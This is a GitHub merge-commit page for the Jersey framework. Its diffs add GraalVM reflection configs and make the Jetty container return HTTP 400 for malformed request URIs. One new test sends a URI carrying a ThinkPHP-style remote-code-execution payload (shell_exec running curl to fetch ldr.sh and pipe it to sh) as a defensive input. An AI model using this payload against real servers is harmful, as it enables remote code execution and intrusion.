Skip to content

Commit

Permalink
Merge branch 'master' into issue4742
Browse files Browse the repository at this point in the history
  • Loading branch information
jbescos committed Jul 2, 2021
2 parents fd90450 + cb52575 commit 0a36465
Show file tree
Hide file tree
Showing 38 changed files with 1,116 additions and 28 deletions.
1 change: 1 addition & 0 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -1,6 +1,7 @@
# maven noise
target/
target-*/
target*/

# gradle noise
.gradle
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
[
{
"name":"org.glassfish.grizzly.Buffer[]"
},
{
"name":"org.glassfish.grizzly.ConnectionProbe[]"
},
{
"name":"org.glassfish.grizzly.IOEventLifeCycleListener[]"
},
{
"name":"org.glassfish.grizzly.TransportProbe[]"
},
{
"name":"org.glassfish.grizzly.http.HttpProbe[]"
},
{
"name":"org.glassfish.grizzly.http.TransferEncoding[]"
},
{
"name":"org.glassfish.grizzly.http.server.HttpServerProbe[]"
},
{
"name":"org.glassfish.grizzly.http.server.TagLocaleParser",
"methods":[{"name":"<init>","parameterTypes":[] }]
},
{
"name":"org.glassfish.grizzly.http.server.filecache.FileCacheProbe[]"
},
{
"name":"org.glassfish.grizzly.memory.MemoryProbe[]"
},
{
"name":"org.glassfish.grizzly.threadpool.ThreadPoolProbe[]"
},
{
"name":"org.glassfish.jersey.grizzly2.httpserver.GrizzlyHttpContainerProvider"
}
]
7 changes: 5 additions & 2 deletions containers/jetty-http/pom.xml
Original file line number Diff line number Diff line change
Expand Up @@ -37,7 +37,6 @@
<groupId>org.glassfish.hk2.external</groupId>
<artifactId>jakarta.inject</artifactId>
</dependency>

<dependency>
<groupId>org.eclipse.jetty</groupId>
<artifactId>jetty-server</artifactId>
Expand All @@ -50,6 +49,11 @@
<groupId>org.eclipse.jetty</groupId>
<artifactId>jetty-continuation</artifactId>
</dependency>
<dependency>
<groupId>org.apache.httpcomponents</groupId>
<artifactId>httpclient</artifactId>
<scope>test</scope>
</dependency>
</dependencies>

<build>
Expand All @@ -69,7 +73,6 @@
<artifactId>maven-bundle-plugin</artifactId>
<inherited>true</inherited>
</plugin>

</plugins>

<resources>
Expand Down
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
/*
* Copyright (c) 2013, 2020 Oracle and/or its affiliates. All rights reserved.
* Copyright (c) 2013, 2021 Oracle and/or its affiliates. All rights reserved.
*
* This program and the accompanying materials are made available under the
* terms of the Eclipse Public License v. 2.0, which is available at
Expand Down Expand Up @@ -33,6 +33,7 @@

import javax.ws.rs.core.Application;
import javax.ws.rs.core.GenericType;
import javax.ws.rs.core.Response.Status;
import javax.ws.rs.core.SecurityContext;

import javax.inject.Inject;
Expand Down Expand Up @@ -81,7 +82,8 @@ public final class JettyHttpContainer extends AbstractHandler implements Contain
private static final Type REQUEST_TYPE = (new GenericType<Ref<Request>>() {}).getType();
private static final Type RESPONSE_TYPE = (new GenericType<Ref<Response>>() {}).getType();

private static final int INTERNAL_SERVER_ERROR = javax.ws.rs.core.Response.Status.INTERNAL_SERVER_ERROR.getStatusCode();
private static final int INTERNAL_SERVER_ERROR = Status.INTERNAL_SERVER_ERROR.getStatusCode();
private static final Status BAD_REQUEST_STATUS = Status.BAD_REQUEST;

/**
* Cached value of configuration property
Expand Down Expand Up @@ -145,9 +147,9 @@ public void handle(final String target, final Request request, final HttpServlet

final Response response = request.getResponse();
final ResponseWriter responseWriter = new ResponseWriter(request, response, configSetStatusOverSendError);
final URI baseUri = getBaseUri(request);
final URI requestUri = getRequestUri(request, baseUri);
try {
final URI baseUri = getBaseUri(request);
final URI requestUri = getRequestUri(request, baseUri);
final ContainerRequest requestContext = new ContainerRequest(
baseUri,
requestUri,
Expand All @@ -171,25 +173,34 @@ public void handle(final String target, final Request request, final HttpServlet
// Mark the request as handled before generating the body of the response
request.setHandled(true);
appHandler.handle(requestContext);
} catch (URISyntaxException e) {
setResponseForInvalidUri(response, e);
} catch (final Exception ex) {
throw new RuntimeException(ex);
}

}

private URI getRequestUri(final Request request, final URI baseUri) {
try {
final String serverAddress = getServerAddress(baseUri);
String uri = request.getRequestURI();
private URI getRequestUri(final Request request, final URI baseUri) throws URISyntaxException {
final String serverAddress = getServerAddress(baseUri);
String uri = request.getRequestURI();

final String queryString = request.getQueryString();
if (queryString != null) {
uri = uri + "?" + ContainerUtils.encodeUnsafeCharacters(queryString);
}
final String queryString = request.getQueryString();
if (queryString != null) {
uri = uri + "?" + ContainerUtils.encodeUnsafeCharacters(queryString);
}

return new URI(serverAddress + uri);
} catch (URISyntaxException ex) {
throw new IllegalArgumentException(ex);
return new URI(serverAddress + uri);
}

private void setResponseForInvalidUri(final HttpServletResponse response, final Throwable throwable) throws IOException {
LOGGER.log(Level.FINER, "Error while processing request.", throwable);

if (configSetStatusOverSendError) {
response.reset();
//noinspection deprecation
response.setStatus(BAD_REQUEST_STATUS.getStatusCode(), BAD_REQUEST_STATUS.getReasonPhrase());
} else {
response.sendError(BAD_REQUEST_STATUS.getStatusCode(), BAD_REQUEST_STATUS.getReasonPhrase());
}
}

Expand Down
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
/*
* Copyright (c) 2010, 2018 Oracle and/or its affiliates. All rights reserved.
* Copyright (c) 2010, 2021 Oracle and/or its affiliates. All rights reserved.
*
* This program and the accompanying materials are made available under the
* terms of the Eclipse Public License v. 2.0, which is available at
Expand All @@ -16,6 +16,11 @@

package org.glassfish.jersey.jetty;

import org.apache.http.HttpHost;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClientBuilder;
import org.apache.http.message.BasicHttpRequest;
import org.junit.Test;

import javax.ws.rs.GET;
Expand All @@ -28,6 +33,7 @@
import javax.ws.rs.core.Response;

import java.io.IOException;
import java.net.URI;

import static org.junit.Assert.assertEquals;

Expand All @@ -44,6 +50,21 @@ public String get(@PathParam("status") int status) {

}

@Test
public void test400StatusCodeForIllegalSymbolsInURI() throws IOException {
startServer(ExceptionResource.class);
URI testUri = getUri().build();
String incorrectFragment = "/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\\x5Cthink\\x5Capp/invokefunction"
+ "&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0"
+ ".0.1/ldr.sh|sh";
BasicHttpRequest request = new BasicHttpRequest("GET", testUri + incorrectFragment);
CloseableHttpClient client = HttpClientBuilder.create().build();

CloseableHttpResponse response = client.execute(new HttpHost(testUri.getHost(), testUri.getPort()), request);

assertEquals(400, response.getStatusLine().getStatusCode());
}

@Test
public void test400StatusCode() throws IOException {
startServer(ExceptionResource.class);
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,153 @@
[
{
"name":"org.glassfish.jersey.internal.config.ExternalPropertiesAutoDiscoverable",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.internal.inject.Custom",
"allDeclaredMethods":true
},
{
"name":"org.glassfish.jersey.internal.ServiceFinder",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.logging.LoggingFeatureAutoDiscoverable",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.AbstractFormProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true
},
{
"name":"org.glassfish.jersey.message.internal.AbstractMessageReaderWriterProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true
},
{
"name":"org.glassfish.jersey.message.internal.BasicTypesMessageProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.ByteArrayProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.DataSourceProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.EnumMessageProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allPublicMethods":true,
"allDeclaredConstructors":true,
"allPublicConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.FileProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.FormMultivaluedMapProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.FormProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.InputStreamProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.ReaderProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.RenderedImageProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.SourceProvider$DomSourceReader",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.SourceProvider$SaxSourceReader",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.SourceProvider$SourceWriter",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.SourceProvider$StreamSourceReader",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.StreamingOutputProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.message.internal.StringMessageProvider",
"allDeclaredFields":true,
"allDeclaredMethods":true,
"allDeclaredConstructors":true
},
{
"name":"org.glassfish.jersey.process.Inflector",
"methods":[{"name":"apply","parameterTypes":["java.lang.Object"] }]
},
{
"name":"org.glassfish.jersey.process.internal.RequestScope",
"allDeclaredFields":true,
"allDeclaredMethods":true
},
{
"name":"org.glassfish.jersey.spi.AbstractThreadPoolProvider",
"allDeclaredMethods":true
},
{
"name":"org.glassfish.jersey.spi.ScheduledThreadPoolExecutorProvider",
"allDeclaredMethods":true
},
{
"name":"org.glassfish.jersey.spi.ThreadPoolExecutorProvider",
"allDeclaredMethods":true
}
]
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
{
"bundles": [
{"name": "org.glassfish.jersey.internal.localization"}
]
}
Loading

0 comments on commit 0a36465

Please sign in to comment.